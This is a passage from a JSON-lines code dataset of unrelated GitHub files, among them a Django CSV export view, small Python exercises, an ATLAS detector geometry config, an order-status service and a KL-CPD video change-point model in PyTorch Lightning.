OriginalCountry=models.F('ticket__country'),\n ExtraCountries=models.Func(\n models.F('ticket__countries'),\n models.Value(','),\n function='ARRAY_TO_STRING',\n output_field=models.CharField()\n )\n )\n\n writer = DictWriter(DummyBuffer(), fieldnames=cols.keys())\n header_with_rows = chain(\n [dict(zip(cols.keys(), cols.keys()))],\n queryset.values(**cols)\n )\n\n response = StreamingHttpResponse(\n streaming_content=(\n writer.writerow(row) for row in header_with_rows\n ),\n content_type='text/csv'\n )\n\n response['Content-Disposition'] = (\n 'attachment; filename=\"expenses-{}.csv\"'.format(\n datetime.utcnow().strftime('%x')))\n\n return response\n","repo_name":"occrp/id-backend","sub_path":"api_v3/views/expense_exports.py","file_name":"expense_exports.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10251091247","text":"def printN(n,N):\n if n==1:\n xing=\"*\"\n elif n==2:\n xing=\"**\"\n else:\n xing=\"*\"*n\n print(\"{:^{}}\".format(xing,N))\ninputV=input()\ntotal=eval(inputV)\nfor x in range(1,eval(inputV)+1,2):\n printN(x,total)\n\n\n n = eval(input())\nfor i in range(1,n+1,2):\n print(\"{0:^{1}}\".format('*'*i, n))","repo_name":"dagangge/myPythonCode","sub_path":"3第三周天天向上的力量/星号三角形.py","file_name":"星号三角形.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39670561390","text":"from discord.ext import commands\nfrom random import 
choice\n\nclass names(commands.Cog):\n\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\t\twith open('names.txt', 'r') as s:\n\t\t\tself.names = s.readlines()\n\n\t@commands.command()\n\tasync def name(self, ctx):\n\t\tname = choice(self.names).rstrip('\\n')\n\t\tif name[-1] in tuple('aiou'):\n\t\t\tsityName = name + choice(tuple('bcfgjklmnprsvz')) + 'ity'\n\t\telif name[-1] == 'e':\n\t\t\tsityName = name[:-1] + 'ity'\n\t\telse:\n\t\t\tsityName = name + 'ity'\n\t\tawait ctx.send(sityName)\n\ndef setup(bot):\n\tbot.add_cog(names(bot))\n","repo_name":"yayapple/soup-bot","sub_path":"cogs/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71093940993","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\n\nfrom IOVDbSvc.IOVDbSvcConfig import addFoldersSplitOnline\n\ndef ALFA_DetectorToolCfg(flags, name=\"ALFA_DetectorTool\", **kwargs):\n result = ComponentAccumulator()\n theALFA_DetectorTool = CompFactory.ALFA_DetectorTool(name=\"ALFA_DetectorTool\")\n theALFA_DetectorTool.MetrologyType=3\n theALFA_DetectorTool.B7L1U_MDGeometryType = 2\n theALFA_DetectorTool.B7L1U_ODGeometryType = 2\n theALFA_DetectorTool.B7L1L_MDGeometryType = 2\n theALFA_DetectorTool.B7L1L_ODGeometryType = 2\n theALFA_DetectorTool.A7L1U_MDGeometryType = 2\n theALFA_DetectorTool.A7L1U_ODGeometryType = 2\n theALFA_DetectorTool.A7L1L_MDGeometryType = 2\n theALFA_DetectorTool.A7L1L_ODGeometryType = 2\n theALFA_DetectorTool.A7R1U_MDGeometryType = 2\n theALFA_DetectorTool.A7R1U_ODGeometryType = 2\n theALFA_DetectorTool.A7R1L_MDGeometryType = 2\n theALFA_DetectorTool.A7R1L_ODGeometryType = 2\n theALFA_DetectorTool.B7R1U_MDGeometryType = 2\n theALFA_DetectorTool.B7R1U_ODGeometryType = 2\n theALFA_DetectorTool.B7R1L_MDGeometryType = 2\n theALFA_DetectorTool.B7R1L_ODGeometryType = 2\n result.merge(addFoldersSplitOnline(flags,'FWD','/FWD/Onl/ALFA/position_calibration','/FWD/ALFA/position_calibration'))\n result.setPrivateTools(theALFA_DetectorTool)\n return result\n\n\ndef ForDetGeometryCfg(flags):\n from AtlasGeoModel.GeoModelConfig import GeoModelCfg\n result = GeoModelCfg(flags)\n geoModelSvc=result.getPrimary()\n geoModelSvc.DetectorTools += [ CompFactory.ForDetEnvelopeTool() ]\n # LUCID\n if flags.Detector.GeometryLucid:\n geoModelSvc.DetectorTools += [ CompFactory.LUCID_DetectorTool() ]\n # ALFA\n if flags.Detector.GeometryALFA:\n geoModelSvc.DetectorTools += [ result.popToolsAndMerge(ALFA_DetectorToolCfg(flags)) ]\n # ForwardRegion\n if flags.Detector.GeometryFwdRegion:\n # ForwardRegionGeoModelFactory (created by\n # ForwardRegionGeoModelTool) has a PublicToolHandle to\n # IForwardRegionProperties. 
Outside of simulation jobs the\n # default version of the tool seems to be used.\n from AthenaConfiguration.Enums import ProductionStep\n if flags.Common.ProductionStep in [ProductionStep.Simulation, ProductionStep.FastChain]:\n from ForwardRegionProperties.ForwardRegionPropertiesConfig import ForwardRegionPropertiesCfg\n tool = result.popToolsAndMerge(ForwardRegionPropertiesCfg(flags))\n result.addPublicTool(tool)\n geoModelSvc.DetectorTools += [ CompFactory.ForwardRegionGeoModelTool() ]\n # ZDC\n if flags.Detector.GeometryZDC:\n geoModelSvc.DetectorTools += [ CompFactory.ZDC_DetTool() ]\n # AFP\n if flags.Detector.GeometryAFP:\n geoModelSvc.DetectorTools += [ CompFactory.AFP_GeoModelTool() ]\n return result\n","repo_name":"Yusuf-Manjra/athena","sub_path":"DetectorDescription/GeoModel/AtlasGeoModel/python/ForDetGeoModelConfig.py","file_name":"ForDetGeoModelConfig.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1165355255","text":"import queue\n\nclass BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \n#Function for printing the detailed of Tree\ndef printTreeDetail(root):\n if root == None:\n return \n print(root.data, end = \" : \")\n if root.left != None:\n print(\"L\", root.left.data, end = \",\")\n if root.right != None:\n print(\"R\", root.right.data, end=\"\")\n print()\n printTreeDetail(root.left)\n printTreeDetail(root.right)\n\n#function for print the value under the k1 and k2\ndef printElementK1K2(root, k1, k2):\n if root == None:\n return \n elif root.data > k2:\n return printElementK1K2(root.left, k1, k2)\n elif root.data < k1:\n return printElementK1K2(root.right, k1, k2)\n else:\n print(root.data)\n printElementK1K2(root.left, k1, k2)\n printElementK1K2(root.right, k1, k2)\n\n#Function for the taking input levelwise\ndef levelWiseTreeInput():\n q = queue.Queue()\n print(\"Enter root:\")\n rootData = int(input())\n if rootData == -1:\n return None\n root = BinaryTreeNode(rootData)\n q.put(root)\n while (not(q.empty())):\n current_node = q.get()\n print(\"Enter left child of \", current_node.data)\n leftChildData = int(input())\n if leftChildData != -1:\n leftChild = BinaryTreeNode(leftChildData)\n current_node.left = leftChild\n q.put(leftChild)\n\n print(\"Enter right child of \", current_node.data)\n rightChildData = int(input())\n if rightChildData != -1:\n rightChild = BinaryTreeNode(rightChildData)\n current_node.right = rightChild\n q.put(rightChild)\n\n return root\n\n\nroot = levelWiseTreeInput()\nprintTreeDetail(root)\nprint(printElementK1K2(root, 5, 10))\n\n","repo_name":"Surendraprajapat18/Python_DSA","sub_path":"#39printElementk1k2.py","file_name":"#39printElementk1k2.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"71248173635","text":"def reverse(arr):\n for i in range(0, int(len(arr)/2)):\n count = len(arr)-1-i\n temp = arr[i]\n last = arr[count]\n arr[i] = last\n arr[count] = temp\n return arr\n \ndef reverse_improved(arr):\n for i in range(0, int(len(arr)/2)):\n count = len(arr)-1-i\n temp = arr[i]\n arr[i]= arr[count]\n arr[count] = temp\n return arr 
\n\n","repo_name":"Urus-Corsa/Data-Structures-Algorithms","sub_path":"Iteration/reverse_array.py","file_name":"reverse_array.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9721911693","text":"\"\"\"\nFile: direct_model_tf.py \n-------------------\nThis file contains the Tensorflow source code for the direct, generative \nlearning-based registration model as described in section 2.3. \n\"\"\" \n\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom matplotlib import pyplot as plt \n\nINPUT_DIM = 7864320\nOUTPUT_DIM = 6291456 \n\n\n# Model \nmodel = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(INPUT_DIM,)),\n tf.keras.layers.Dense(28, activation='relu'),\n tf.keras.layers.Dense(OUTPUT_DIM, activation='sigmoid')\n])\n\n# Training \nmodel.compile(optimizer='adam', loss='binary_crossentropy')\n\nmodel.fit(processed_train, fixed_train,\n epochs=250, \n batch_size=1,\n shuffle=True)\n\n# Testing \ndef dice_coef(y_true, y_pred, smooth=1):\n # adapted from \n # https://towardsdatascience.com/metrics-to-evaluate-your-semantic-segmentation-model-6bcb99639aa2\n intersection = K.sum(y_true * y_pred)\n union = K.sum(y_true) + K.sum(y_pred)\n dice = K.mean((2. * intersection + smooth)/(union + smooth))\n return dice\n\npredicted_imgs_batch = model.predict(processed_test_set) \n\nresults_total = 0\nfor i in range(len(predicted_imgs_batch)):\n result = dice_coef(fixed_test_batch[i], predicted_imgs_batch[i])\n results_total += float(result)\nprint(\"The average Dice score on the test set is: \", results_total/len(predicted_imgs_batch))\n\n","repo_name":"rosikand/canary-crest","sub_path":"learning-based/direct_model_tf.py","file_name":"direct_model_tf.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69804015554","text":"import os, sys, shutil, git, re, json, time, logging, subprocess, pathlib, hashlib\n\nfrom os.path import basename, isfile, isdir, splitext\n\nfrom gitload.models import PLTP, PL\n\nfrom pysrc.question import Question, ErrorPL\n\nfrom serverpl.settings import SANDBOX_URL, DIRREPO\n\nfrom django.conf import settings\nfrom django.core.files.storage import Storage\n\n\n\nclass NotChecked(Exception):\n pass\n\n\nclass PL_Loader():\n \"\"\"Handle the loading of a PL by checking its integrity and loading it into the database. \"\"\"\n def __init__(self, rel_path, repository):\n self.name = splitext(basename(rel_path))[0]\n self.rel_path = rel_path\n self.repository = repository\n self.sha1 = self._get_sha1()\n self.root = DIRREPO+'/'+repository.name\n self.dic = None\n \n \n def load(self, pltp, force = False):\n \"\"\" Load the PL by checking its integrity and adding it to the database.\n Return (True, None) if the PL was correctly loaded, (False, error_message)\n if something wrong happened. 
\"\"\"\n try:\n q= Question(self.rel_path, self.root)\n self.dic = q.dico\n self.zipvalue = q.getZipValue()\n except ErrorPL as e:\n return False, \"Impossible de charger \"+self.rel_path+\": \"+str(e)\n \n self._add_to_db(pltp, force)\n \n return True, None\n \n def _get_sha1(self):\n \"\"\" Create a sha1 with the name of the PL and the name+version of the git containing it \"\"\"\n hasher = hashlib.sha1()\n hasher.update((self.name+self.repository.name).encode('utf-8'))\n return hasher.hexdigest()\n \n def _add_to_db(self, pltp, force):\n \"\"\" Add the PL to the database if none with the same sha1 already exists. \"\"\"\n try:\n pl = PL.objects.get(sha1=self.sha1)\n if force:\n pl.delete()\n raise PL.DoesNotExist\n except PL.DoesNotExist:\n pl = PL(name=self.name, sha1=self.sha1, json= self.dic, repository=self.repository, rel_path=self.rel_path)\n pl.save()\n pl.pltp.add(pltp)\n\n\n\nclass PLTP_Loader():\n \"\"\"Handle the loading of a PLTP by checking its integrity and its PL integrity and loading them into the database. \"\"\"\n def __init__(self, rel_path, repository):\n self.name = splitext(basename(rel_path))[0]\n self.rel_path = rel_path\n self.repository = repository\n self.sha1 = self._get_sha1()\n self.root = DIRREPO+'/'+repository.name\n self.url = \"/PlayExo/lti/\"+self.sha1\n self.dic = None\n self.pl = None\n \n def load(self, force=False):\n \"\"\" Load the PLTP by checking its integrity and adding it and every self.pl to the database.\n Return:\n - (sha1, None) if the PLTP was loaded\n - (None, error_msg) if PLTP couldn't be loaded\n - (None, None) if PLTP is already loaded\n \"\"\"\n try:\n self.dic = Question(self.rel_path, self.root).dico\n except ErrorPL as e:\n return None, \"Impossible de charger \"+self.rel_path+\": \"+e.message\n if not self._add_to_db(force):\n return None, None\n \n pltp = PLTP.objects.get(sha1=self.sha1)\n self.pl = self._get_pl_list()\n if (not self.pl):\n pltp.delete()\n return None, \"Erreur: Impossible de récuperer la liste des PL associés à \"+self.rel_path\n \n for pl in self.pl:\n loaded, error = pl.load(pltp, force)\n if (not loaded):\n pltp.delete()\n return None, error\n \n return self.sha1, None\n \n def _get_sha1(self):\n \"\"\" Create a sha1 with the name of the PLTP and the name+version of the git containing it \"\"\"\n hasher = hashlib.sha1()\n hasher.update((self.name+self.repository.name).encode('utf-8'))\n return hasher.hexdigest()\n \n def _get_pl_list(self):\n \"\"\" Return the list of every PL_Loader needed by this pltp \"\"\"\n pltp = open(self.root+self.rel_path, \"r\")\n pl_list = list()\n for line in pltp:\n if (line[0] == '@'):\n i=1\n while line[i]==' ':\n i=i+1\n filename=line[i:-1]\n pl_list.append(PL_Loader(filename, self.repository))\n pltp.close()\n return pl_list\n \n def _add_to_db(self, force):\n \"\"\" Try to add the PLTP to the database, return True if the PLTP was created, \n if force = False, return False if one with the same sha1 already exists, else load it anyway.\"\"\"\n\n try:\n existing = PLTP.objects.get(sha1=self.sha1)\n if (force):\n existing.delete()\n raise PLTP.DoesNotExist\n except PLTP.DoesNotExist:\n pltp = PLTP(name=self.name, url=self.url, sha1=self.sha1, json=self.dic, repository=self.repository, rel_path=self.rel_path)\n pltp.save()\n return True\n return False\n 
pass\n\n","repo_name":"plgitlogin/server-pl","sub_path":"gitload/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3611159808","text":"import json\nimport time\nimport requests\nfrom hashlib import sha256\n\nfrom flask_babel import gettext as _\n\nfrom app.helpers import log_info\nfrom app.helpers.date_time import current_timestamp\nfrom app.models.order import Order\n\n\nclass OrderStaticMethodsService(object):\n \"\"\" 订单静态方法Service \"\"\"\n\n @staticmethod\n def order_status_text_and_action_code(order):\n \"\"\" 获取订单状态和订单指令 \"\"\"\n status_text = u'' # 待付款 待发货 已发货 已取消 已完成\n action_code = [] # 订单指令列表: 1.发货; 2.取消订单;\n\n if order.order_status == 1:\n if order.pay_status == 1:\n status_text = _(u'待付款')\n action_code = [2]\n\n return (status_text, action_code)\n\n if order.pay_status == 2:\n if order.shipping_status == 1:\n status_text = _(u'待发货')\n action_code = [1]\n\n return (status_text, action_code)\n\n if order.shipping_status == 2 and order.deliver_status == 1:\n status_text = _(u'已发货')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 2:\n status_text = _(u'已完成')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 3:\n status_text = _(u'已取消')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 4:\n if order.aftersale_status == 1:\n status_text = _(u'已退款')\n action_code = []\n\n return (status_text, action_code)\n\n if order.aftersale_status == 2:\n status_text = _(u'已换货')\n action_code = []\n\n return (status_text, action_code)\n\n if order.aftersale_status == 3:\n status_text = _(u'已退款,已换货')\n action_code = []\n\n return (status_text, action_code)\n\n return (status_text, action_code)\n \n\n @staticmethod\n def track(com, code):\n \"\"\"查询物流\"\"\"\n\n # 查询\n data = {'type':com, 'postid':code, 'id':1, 'valicode':'', 'temp':'0.49738534969422676'}\n url = 'https://m.kuaidi100.com/query'\n res = requests.post(url, data=data)\n res.encoding = 'utf8'\n\n # 检查 - 获取验证信息\n if res.status_code != 200:\n return (_(u'查询失败'), [])\n\n data = res.json()\n if data['message'] != 'ok':\n return (_(u'查询失败'), [])\n\n return ('ok', data['data'])\n\n\n @staticmethod\n def order_status_text(order):\n \"\"\"获取订单状态文本\"\"\"\n return OrderStaticMethodsService.order_status_text_and_action_code(order)[0]\n\n\n @staticmethod\n def goods_list_text(goods_data):\n \"\"\"获取商品列表数据转成text文本\"\"\"\n goods_list = []\n try:\n goods_list = json.loads(goods_data)\n except Exception as identifier:\n pass\n\n lst = []\n for goods in goods_list:\n item = u'%s x%d' % (goods.get('goods_name', ''), goods.get('quantity', 0))\n lst.append(item)\n return '\\n'.join(lst)\n\n \n @staticmethod\n def order_address_text(order_address):\n \"\"\"获取订单地址文本\"\"\"\n if not order_address:\n return ''\n\n return u'%s %s %s %s' % (order_address.province, order_address.city, \n order_address.district, order_address.address)\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/services/admin/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"22006243363","text":"import sys; sys.stdin = open(\"2975.txt\", \"r\")\n\nwhile True:\n ip = list(input().split())\n if ip[0] == '0' and ip[1] == 'W' and ip[2] == '0':\n break\n else:\n if ip[1] == 'W':\n answer = int(ip[0]) - 
int(ip[2])\n else:\n answer = int(ip[0]) + int(ip[2])\n if answer >= -200:\n print(answer)\n else:\n print(\"Not allowed\")\n","repo_name":"vreez/APS","sub_path":"boj/boj_2975_Transactions.py","file_name":"boj_2975_Transactions.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38399504109","text":"import sys \nimport matplotlib.pyplot as plt \n\nt = []\nr = []\n\nwith open(sys.argv[1], 'r') as f:\n line = f.readline()\n is_t = True\n line_no = 1 \n while line:\n if(is_t):\n t.append(line)\n else:\n r.append(float(line))\n is_t = not is_t\n line = f.readline()\n line_no += 1 \n\n \nplt.scatter(t, r) \nplt.show()\n","repo_name":"MinhyukPark/Computers-Education-Research","sub_path":"python_scripts/ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1563547888","text":"import csv\n\ndef read_dictionary(filename, key_column_index = 0):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n students = {}\n\n with open(filename, \"rt\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n\n for line in reader:\n stud_key = line[key_column_index]\n students[stud_key] = line[1]\n\n return students\n\ndef main():\n stud = read_dictionary(\"students.csv\")\n \n s = input(\"Please enter an I-Number (xxxxxxxxx): \")\n if s in stud:\n print(f\"{stud[s]}\")\n else:\n print(\"No such student\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"caiosabarros/byui-cse_111","sub_path":"students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5519846625","text":"import torch.nn as nn\nimport pytorch_lightning as pl\nimport torch\nimport numpy as np\nimport random\nfrom typing import List, Tuple\nfrom torch.utils.data import DataLoader, Dataset\nimport utils.kl_cpd as klcpd\n\n\ndef fix_seeds(seed):\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.cuda.manual_seed_all(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n\nclass NetG(nn.Module):\n def __init__(self, args) -> None:\n\n super(NetG, self).__init__()\n self.RNN_hid_dim = args[\"RNN_hid_dim\"]\n self.emb_dim = args[\"emb_dim\"]\n self.relu = nn.ReLU()\n\n self.fc = nn.Linear(args[\"data_dim\"], self.emb_dim)\n self.rnn_enc_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.rnn_dec_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.fc_layer = nn.Linear(self.RNN_hid_dim, args[\"data_dim\"])\n\n def forward(self, X_p, X_f, noise) -> torch.Tensor:\n X_p = self.relu(self.fc(X_p))\n X_f = self.relu(self.fc(X_f))\n\n X_p_enc, h_t = self.rnn_enc_layer(X_p)\n X_f_shft = self.shft_right_one(X_f)\n hidden = h_t + noise\n Y_f, _ = self.rnn_dec_layer(X_f_shft, hidden)\n output = self.fc_layer(Y_f)\n return output\n\n def shft_right_one(self, X) -> torch.Tensor:\n X_shft = X.clone()\n X_shft[:, 0, :].data.fill_(0)\n X_shft[:, 1:, :] = X[:, :-1, :]\n return 
X_shft\n\n\nclass NetD(nn.Module):\n def __init__(self, args) -> None:\n super(NetD, self).__init__()\n self.RNN_hid_dim = args[\"RNN_hid_dim\"]\n self.emb_dim = args[\"emb_dim\"]\n\n self.fc1 = nn.Linear(args[\"data_dim\"], self.emb_dim)\n\n self.rnn_enc_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.rnn_dec_layer = nn.GRU(\n self.RNN_hid_dim,\n self.emb_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n\n self.fc2 = nn.Linear(self.emb_dim, args[\"data_dim\"])\n self.relu = nn.ReLU()\n\n def forward(self, X) -> Tuple[torch.Tensor, torch.Tensor]:\n X = self.relu(self.fc1(X))\n X_enc, _ = self.rnn_enc_layer(X)\n X_dec, _ = self.rnn_dec_layer(X_enc)\n X_dec = self.relu(self.fc2(X_dec))\n return X_enc, X_dec\n\n\nclass NetE(nn.Module):\n def __init__(self, args) -> None:\n super(NetE, self).__init__()\n self.conv1 = nn.Conv2d(\n in_channels=args[\"in_channels\"],\n out_channels=12,#12\n kernel_size=5,\n stride=2,\n dilation=2,\n )\n self.conv2 = nn.Conv2d(#12, 6, 3\n in_channels=12, out_channels=6, kernel_size=3, stride=2, dilation=2\n )\n self.maxpool = nn.MaxPool2d(3)\n self.flatten = nn.Flatten()\n\n def forward(self, X) -> torch.Tensor:\n output = []\n for frame_num in range(X.shape[-3]):\n x = nn.ReLU()(self.conv1(X[:, :, frame_num, :, :]))\n x = self.maxpool(nn.ReLU()(self.conv2(x)))\n x = self.flatten(x)\n output.append(x)\n return torch.stack(output, dim=2)\n\n\n#################################################################\nclass KLCPDVideo(pl.LightningModule):\n def __init__(\n self,\n netG: nn.Module,\n netD: nn.Module,\n args: dict,\n train_dataset: Dataset,\n test_dataset: Dataset,\n num_workers: int = 2,\n extractor: nn.Module = None,\n ) -> None:\n\n super().__init__()\n self.args = args\n self.netG = netG\n self.netD = netD\n\n if extractor == None:\n # Feature extractor for video datasets\n self.extractor = torch.hub.load(\n \"facebookresearch/pytorchvideo:main\", \"x3d_m\", pretrained=True\n )\n self.extractor = nn.Sequential(*list(self.extractor.blocks[:5]))\n else:\n self.extractor = extractor\n\n self.train_dataset = train_dataset\n self.test_dataset = test_dataset\n\n sigma_list = klcpd.median_heuristic(self.args[\"sqdist\"], beta=0.5)\n self.sigma_var = torch.FloatTensor(sigma_list)\n\n # to get predictions\n self.window_1 = self.args[\"window_1\"]\n self.window_2 = self.args[\"window_2\"]\n\n self.num_workers = num_workers\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n\n # X = batch[0].to(torch.float32)\n X = inputs[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n X_p_enc, _ = self.netD(X_p)\n X_f_enc, _ = self.netD(X_f)\n\n Y_pred = klcpd.batch_mmd2_loss(X_p_enc, X_f_enc, self.sigma_var.to(self.device))\n\n return Y_pred\n\n # Alternating schedule for optimizer steps (e.g. 
GANs)\n def optimizer_step(\n self,\n epoch: int,\n batch_idx: int,\n optimizer: torch.optim.Optimizer,\n optimizer_idx: int,\n optimizer_closure,\n on_tpu: bool = False,\n using_native_amp: bool = False,\n using_lbfgs: bool = False,\n ):\n # update generator every CRITIC_ITERS steps\n if optimizer_idx == 0:\n if (batch_idx + 1) % self.args[\"CRITIC_ITERS\"] == 0:\n # the closure (which includes the `training_step`) will be executed by `optimizer.step`\n optimizer.step(closure=optimizer_closure)\n else:\n # call the closure by itself to run `training_step` + `backward` without an optimizer step\n optimizer_closure()\n\n # update discriminator every step\n if optimizer_idx == 1:\n for p in self.netD.rnn_enc_layer.parameters():\n p.data.clamp_(-self.args[\"weight_clip\"], self.args[\"weight_clip\"])\n optimizer.step(closure=optimizer_closure)\n\n def training_step(\n self, batch: torch.Tensor, batch_idx: int, optimizer_idx: int\n ) -> torch.Tensor:\n\n # optimize discriminator (netD)\n if optimizer_idx == 1:\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n batch_size = X_p.size(0)\n\n # real data\n X_p_enc, X_p_dec = self.netD(X_p)\n X_f_enc, X_f_dec = self.netD(X_f)\n\n # fake data\n noise = torch.FloatTensor(1, batch_size, self.args[\"RNN_hid_dim\"]).normal_(\n 0, 1\n )\n noise.requires_grad = False\n noise = noise.to(self.device)\n\n Y_f = self.netG(X_p, X_f, noise)\n Y_f_enc, Y_f_dec = self.netD(Y_f)\n\n lossD, mmd2_real = klcpd.mmdLossD(\n X_f,\n Y_f,\n X_f_enc,\n Y_f_enc,\n X_p_enc,\n X_f_dec,\n Y_f_dec,\n self.args[\"lambda_ae\"],\n self.args[\"lambda_real\"],\n self.sigma_var.to(self.device),\n )\n lossD = (-1) * lossD\n self.log(\"train_loss_D\", lossD, prog_bar=True)\n self.log(\"train_mmd2_real_D\", mmd2_real, prog_bar=True)\n\n # print('train loss D:', lossD)\n\n return lossD\n\n # optimize generator (netG)\n if optimizer_idx == 0:\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n batch_size = X_p.size(0)\n\n # real data\n X_f_enc, X_f_dec = self.netD(X_f)\n\n # fake data\n noise = torch.FloatTensor(1, batch_size, self.args[\"RNN_hid_dim\"]).normal_(\n 0, 1\n )\n noise.requires_grad = False\n noise = noise.to(self.device)\n\n Y_f = self.netG(X_p, X_f, noise)\n Y_f_enc, Y_f_dec = self.netD(Y_f)\n\n # batchwise MMD2 loss between X_f and Y_f\n G_mmd2 = klcpd.batch_mmd2_loss(\n X_f_enc, Y_f_enc, self.sigma_var.to(self.device)\n )\n\n lossG = G_mmd2.mean()\n self.log(\"train_loss_G\", lossG, prog_bar=True)\n\n # print('train loss G:', lossG)\n\n return lossG\n\n def validation_step(self, batch: torch.Tensor, batch_idx: int) -> torch.Tensor:\n\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n X_p_enc, _ = self.netD(X_p)\n X_f_enc, _ = 
self.netD(X_f)\n\n        val_mmd2_real = klcpd.batch_mmd2_loss(\n            X_p_enc, X_f_enc, self.sigma_var.to(self.device)\n        )\n\n        self.log(\"val_mmd2_real_D\", val_mmd2_real, prog_bar=True)\n\n        return val_mmd2_real\n\n    def configure_optimizers(\n        self,\n    ) -> Tuple[torch.optim.Optimizer, torch.optim.Optimizer]:\n\n        optimizerG = torch.optim.Adam(\n            self.netG.parameters(),\n            lr=self.args[\"lr\"],\n            weight_decay=self.args[\"weight_decay\"],\n        )\n\n        optimizerD = torch.optim.Adam(\n            self.netD.parameters(),\n            lr=self.args[\"lr\"],\n            weight_decay=self.args[\"weight_decay\"],\n        )\n\n        return optimizerG, optimizerD\n\n    def train_dataloader(self):\n        return DataLoader(\n            self.train_dataset,\n            batch_size=self.args[\"batch_size\"],\n            shuffle=True,\n            num_workers=self.num_workers,\n        )\n\n    def val_dataloader(self):\n        return DataLoader(\n            self.test_dataset,\n            batch_size=self.args[\"batch_size\"],\n            shuffle=False,\n            num_workers=self.num_workers,\n        )\n\n    def test_dataloader(self):\n        return DataLoader(\n            self.test_dataset,\n            batch_size=self.args[\"batch_size\"],\n            shuffle=False,\n            num_workers=self.num_workers,\n        )\n","repo_name":"romanenkova95/kl_cpd_for_video","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
